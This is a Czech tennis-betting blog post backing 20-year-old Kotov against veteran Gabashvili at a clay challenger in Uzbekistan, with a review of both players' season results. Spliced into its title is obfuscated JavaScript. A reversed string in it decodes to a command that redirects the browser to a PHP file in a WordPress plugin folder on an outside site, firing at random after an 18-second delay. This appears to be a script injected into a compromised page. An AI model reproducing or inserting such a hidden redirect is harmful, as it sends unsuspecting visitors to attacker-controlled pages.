Přeskočit na obsah

Samark$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, 2kolo, antuka. Kotov

Ve 2kole challengeru v Uzbekistánu dám v souboji dvou Ruských hráčů toho mladšího, 20letého Kotova s veteránem, 33letým Gabashvilim. Kurz mi zde přijde velmi solidní což je asi hlavně jménu co má stále Gabashvili. Podíváme li se totiž na letošní (nejen)antukovou sezonu, rozdíl je zde obrovský.
Kotov má 12-8 a začíná se drápat žebříčkem nahoru. Má jedno SF a 4x 3kolo. Na antuce porazil Darcise, Sakharova, T.Griekspoora a Voronina a prohrál s Magerem, M.Ymerem, Bonzim a naposledy Nedovyesovem ve 3setech. To nejsou úplně špatně výsledky.
Sázka je ale hlavně založena na neformě Gabashviliho která je žalostná. Letos má 15-12 což není úplně nejhorší, na druhou stranu hraje převážně turnaje futures a tak je to dost bída.Letos ani neporazil žádného top 300 hráče. Toto je ale jeho 4 challenger a tam má 2-3 když porazil jen tragického Xiu 62,75 a to na antuce a nyní v 1kole WC Ismailova 61,60 který je taky totálně mimo. Jinak prohry na challengerech s Uchidou na antuce! Lenzem 63,64 a naposledy Voroninem 75,46,52Skr.(kterému pak Kotov dal 62,62…) A předtím prohry s Kirkinem 62,64 Guinardem nebo Parkerem.
Oproti těmto hráčům je Kotov úplně jinde a tak do takových 1,4 myslím že se to dá dávat

Translate »